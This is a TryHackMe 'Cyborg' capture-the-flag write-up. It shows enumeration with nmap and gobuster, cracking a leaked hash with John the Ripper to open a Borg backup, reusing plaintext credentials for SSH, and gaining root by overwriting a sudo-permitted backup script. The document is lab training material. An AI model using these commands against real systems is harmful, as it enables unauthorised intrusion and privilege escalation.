Writeup: Try hack me -- Cyborg
thm writeups / tryhackme / ctf

This is a writeup for Cyborg on TryHackMe


The basics

As per usual, I'm going to write down the easy stuff and omit the answers. However, I'm going to skip the first three questions and go directly for compromising the system. Oh, I forgot one thing, though: Aside for the usual arsenal that Kali provides, we'll need to install something that's called 'borgbackup'. You'll understand why soon enough.

Tasks

#1 What is the user.txt flag?

Okay, for the beginning let's throw in the obligatory NMAP scan:

$ nmap -sC -sV -oN nmap/initial <ip>
Nmap scan report for <ip>
Host is up (0.062s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Okay, so we get port 22 and 80 opened. Let's ignore the ssh for now and look what port 80 is hiding... We bust out our beloved go/dirbuster and take a peek:

$ gobuster dir -u http://10.10.101.55/ -w /usr/share/wordlists/dirb/common.txt -x py,php

And we get...

[...]
/admin (Status: 301)
/etc (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)

Huh. /admin and /etc. Neat!

Okay, so... /admin reveals a simple blog page that after a quick examination doesn't reveal much of anything, but a simple page that's not powered by Wordpress. Maybe a dead end? A closer examination, however, gives us a link to archive.tar. Let's download that and see if we can use that.

$ wget <ip>/admin/archive.tar

and un-tar it with a quick 'tar -xf archive.tar' and look through the folders.

Looking closer into one of the number files gives us this:

home/field/dev/final_archive/data/0$ xxd -c8 1
00000000: 424f 5247 5f53 4547  BORG_SEG
00000008: 40f4 3c25 0900 0000  @.<%....
00000010: 02                   .

What the heck is a BORG_SEG file? Quick Google reveals us that belongs to an archival tool named Borg. Okay. So, let's see what's in it!

home/field/dev/final_archive$ borg info --last 5 /home/by7e_/ctf/thm/cyborg/home/field/dev/final_archive/
Enter passphrase for key home/field/dev/final_archive:

Rats. We don't have a password.

Yet

We still have an undiscovered item on the site... Stuff that's dwelling in /etc. Let's look at that one...

Closer examination of the folder itself tells us it's a Squid (mis)configuration. We can find a passwd in the folder, and it looks like it's sporting a shadow password. And since we don't have the counterpart let's make a fake one!

$ echo "music_archive:x:1000:1000:music_archive,,,:/home/music_archive:/bin/bash" > passwd

$ echo "music_archive:[redacted]" > shadow

And with that...

$ unshadow passwd shadow > crackme.pwd

With that ready, we feed the file to our hungry John.

$ john crackme.pwd --wordlist=/path/to/your/rockyou/list

And --

Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 SSE2 4x3])
[redacted]        (music_archive)
Session completed

Got em!

A quick test against the server's ssh tells us these are invalid credentials for it. But we have something else to use it against, right?

home/field/dev/final_archive$ borg info --last 5 home/field/dev/final_archive/
Enter passphrase for key home/field/dev/final_archive:

And...

Enter passphrase for key /home/by7e_/ctf/thm/cyborg/home/field/dev/final_archive:
Archive name: music_archive
Archive fingerprint: f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82
Comment:
Hostname: ubuntu
Username: root
Time (start): Tue, 2020-12-29 15:00:38
Time (end): Tue, 2020-12-29 15:00:38
Duration: 0.14 seconds
Number of files: 97
Command line: ./borg create /home/field/dev/final_archive::music_archive /home/alex
Utilization of maximum supported archive size: 0%
------------------------------------------------------------------------------
                       Original size      Compressed size    Deduplicated size
This archive:                1.49 MB              1.49 MB              1.50 MB
All archives:                1.52 MB              1.50 MB              1.50 MB

                       Unique chunks         Total chunks
Chunk index:                      99                   99

Got em! Um... x2. Yeah! That's it!

So!

$ borg extract home/field/dev/final_archive::music_archive
Enter passphrase for key home/field/dev/final_archive:

gives us... Lot more files to work with. Great. A quick find gives us a few interesting files to look at:

home/alex$ find .
[...]
./Documents
./Documents/note.txt
[...]
./Desktop
./Desktop/secret.txt
./.bashrc
./.bash_logout
./.profile

Secret, huh?

home/alex$ cat ./Desktop/secret.txt
shoutout to all the people who have gotten to this stage whoop whoop!"

... clever...

HOWEVER --

home/alex$ cat ./Documents/note.txt
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

alex:[expunged]

Nice. And a quick ssh with those credentials gives us access to the machine, and a

home/alex$ cat user.txt

gives us

[nope.pcx]

Great! One down, one to go!


#2 What is the root.txt flag?

Hm... A quick ps -aux reveals nothing special to us. No service that'd run for us to gain root. What about...

$ sudo -l
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh

We check the ownership of the file with

alex@ubuntu:~$ ls -al /etc/mp3backups/backup.sh
-r-xr-xr-- 1 alex alex 1083 Dec 30 01:48 /etc/mp3backups/backup.sh

Ha! We are the owner! This will be super easy! With a quick nano /etc/mp3backups/backup.sh we change the contents of the file to

#!/bin/bash
/bin/bash -c bash

exit

We save, and... Permission denied? What?

Oh, oops.

$ chmod 777 /etc/mp3backups/backup.sh

We retry editing and run it, and -- we're root!

A quick

$ cat /root/root.txt

gives us

[dramatic-look.qt]

And that's it!

- by7e_